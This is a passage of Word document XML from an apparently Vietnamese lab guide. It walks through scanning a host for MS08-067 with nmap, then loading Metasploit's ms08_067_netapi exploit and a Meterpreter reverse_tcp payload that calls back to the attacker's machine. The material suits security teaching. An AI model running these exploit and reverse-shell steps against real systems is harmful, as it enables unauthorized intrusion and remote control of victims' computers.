        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3CE16CD3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>//Dò lỗi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE731D" w:rsidP="00D74CAD" w:rsidRDefault="00F458FF" w14:paraId="1FE6E935" w14:textId="50E80A7D">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="00F458FF">
        <w:rPr/>
        <w:t>msf6 &gt;</w:t>
      </w:r>
      <w:r w:rsidR="00F458FF">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002455BF">
        <w:rPr/>
        <w:t>sudo</w:t>
      </w:r>
      <w:r w:rsidR="002455BF">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE731D">
        <w:rPr/>
        <w:t>nmap</w:t>
      </w:r>
      <w:r w:rsidR="00EE731D">
        <w:rPr/>
        <w:t xml:space="preserve"> --script smb-vuln-ms08-067.nse </w:t>
      </w:r>
      <w:r w:rsidR="55CBB4CC">
        <w:rPr/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidR="00EE731D">
        <w:rPr/>
        <w:t>-p445 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE731D" w:rsidP="00D74CAD" w:rsidRDefault="00F458FF" w14:paraId="6834F4A5" w14:textId="18656D70">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="00F458FF">
        <w:rPr/>
        <w:t xml:space="preserve">msf6 &gt; </w:t>
      </w:r>
      <w:r w:rsidR="002455BF">
        <w:rPr/>
        <w:t>sudo</w:t>
      </w:r>
      <w:r w:rsidR="002455BF">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE731D">
        <w:rPr/>
        <w:t>nmap</w:t>
      </w:r>
      <w:r w:rsidR="00EE731D">
        <w:rPr/>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00EE731D">
        <w:rPr/>
        <w:t>sU</w:t>
      </w:r>
      <w:r w:rsidR="00EE731D">
        <w:rPr/>
        <w:t xml:space="preserve"> --script smb-vuln-ms08-067.nse </w:t>
      </w:r>
      <w:r w:rsidR="539A95DB">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE731D">
        <w:rPr/>
        <w:t>-p U:137 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3CE16CD3" w:rsidP="3CE16CD3" w:rsidRDefault="3CE16CD3" w14:paraId="686F55CE" w14:textId="6D05EF50">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="008E3F20" w:rsidP="008E3F20" w:rsidRDefault="007B4E3E" w14:paraId="29BE7E59" w14:textId="34D0B1E5">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B4E3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bước 2: </w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C" w:rsidR="008E3F20">
        <w:t xml:space="preserve">Chọn module </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED0772" w:rsidR="008E3F20">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">exploit </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED0772" w:rsidR="002F7C13">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">ms08_067_netapi </w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C" w:rsidR="008E3F20">
        <w:t xml:space="preserve">ứng với lỗi hệ thống. Module exploit là </w:t>
      </w:r>
      <w:r w:rsidR="00ED0772">
        <w:t>một</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C" w:rsidR="008E3F20">
        <w:t xml:space="preserve"> dịch vụ lỗi </w:t>
      </w:r>
      <w:r w:rsidR="00567D19">
        <w:t>được m</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C" w:rsidR="008E3F20">
        <w:t>etasploit hỗ trợ để khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="002F7C13" w:rsidP="00501E1D" w:rsidRDefault="002F7C13" w14:paraId="1F439E26" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtHoaThi"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Hlk20493340" w:id="24"/>
      <w:r>
        <w:t xml:space="preserve">Chọn exploit </w:t>
      </w:r>
      <w:r w:rsidRPr="46353666">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ms08_067_netapi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="49611D1A" w14:paraId="4ADD1F67" w14:textId="3D720C99">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>msf6</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C" w:rsidR="3B9C5DF7">
        <w:t xml:space="preserve"> &gt; use exploit/windows/smb/ms08_067_netapi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="49611D1A" w14:paraId="200A8BA9" w14:textId="6CE556A9">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>msf6</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C" w:rsidR="3B9C5DF7">
        <w:t xml:space="preserve"> exploit(windows/smb/ms08_067_netapi) &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="008E3F20" w:rsidP="00501E1D" w:rsidRDefault="008E3F20" w14:paraId="4F9C92AF" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtHoaThi"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>Xem các tham số cần thiết cho exploit này:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="49611D1A" w14:paraId="44B41792" w14:textId="1C5DA4D6">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>msf6</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C" w:rsidR="3B9C5DF7">
        <w:t xml:space="preserve"> exploit(windows/smb/ms08_067_netapi) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="4BF90744" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Module options (exploit/windows/smb/ms08_067_netapi):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="2B98A3A1" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   Name     Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="19CA2EDB" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   ----     ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="7C745974" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   RHOSTS                    yes       The target address range or CIDR identifier</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="1698A570" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   RPORT    445              yes       The SMB service port (TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="790F7B8C" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="62039D19" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Exploit target:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="3FAEB002" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   Id  Name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="2BA31418" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   --  ----</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="2A46AE9E" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   0   Automatic Targeting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="49611D1A" w14:paraId="74A5AB54" w14:textId="20C6813F">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6</w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(windows/smb/ms08_067_netapi) &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="12AA9DBE" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>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tblGrid>
      <w:tr w:rsidRPr="00E93EBC" w:rsidR="00E93EBC" w:rsidTr="008E3F20" w14:paraId="5A4C9533" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidRDefault="008E3F20" w14:paraId="36724EFA" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="008E3F20" w:rsidRDefault="008E3F20" w14:paraId="4704B133" w14:textId="08EEA0B9">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Bước </w:t>
      </w:r>
      <w:r w:rsidR="00F458FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Chọn payload và thiết lập tham số. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Payload là đoạn code sẽ chạy trên máy tính victim.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="49611D1A" w14:paraId="44B685A8" w14:textId="3CC5FB7F">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3CE16CD3">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>msf6</w:t>
      </w:r>
      <w:r w:rsidRPr="3CE16CD3" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(windows/smb/ms08_067_netapi) &gt; set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="293258B2" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>payload =&gt; windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="49611D1A" w14:paraId="0B817644" w14:textId="77D26B87">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6</w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(windows/smb/ms08_067_netapi) &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="49611D1A" w14:paraId="00A2BAC4" w14:textId="22D4D4B4">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6</w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(windows/smb/ms08_067_netapi) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="7DE39D2F" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t> Module options (exploit/windows/smb/ms08_067_netapi):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="201205D2" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   Name     Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="6E75FDF6" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   ----     ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="3F9CBACE" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   RHOSTS   192.168.1.7      yes       The target address range or CIDR identifier</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="7AB75529" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   RPORT    445              yes       The SMB service port (TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="664B0E69" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="6874D08C" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Payload options (windows/meterpreter/reverse_tcp):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="6471751B" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   Name      Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="6FA67C60" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   ----      ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="60FE5A78" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="18E1A781" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   LHOST                      yes       The listen address (an interface may be specified)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="23E3C7A6" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   LPORT     4444             yes       The listen port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="746EDF3A" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Exploit target:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="5C76AF8D" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   Id  Name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="50399B40" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   --  ----</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="4D05B6B9" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   0   Automatic Targeting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="49611D1A" w14:paraId="6F3FB431" w14:textId="1AF6D61D">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6</w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(windows/smb/ms08_067_netapi) &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00501E1D" w:rsidRDefault="008E3F20" w14:paraId="4D79E576" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtHoaThi"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Thiết lập tham số </w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>LHOST</w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t> là địa chỉ máy Kali Linux đang chạy Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="49611D1A" w14:paraId="5864CF96" w14:textId="70DC9F7B">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6</w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(windows/smb/ms08_067_netapi) &gt; set LHOST 192.168.1.10</w:t>
      </w:r>
    </w:p>
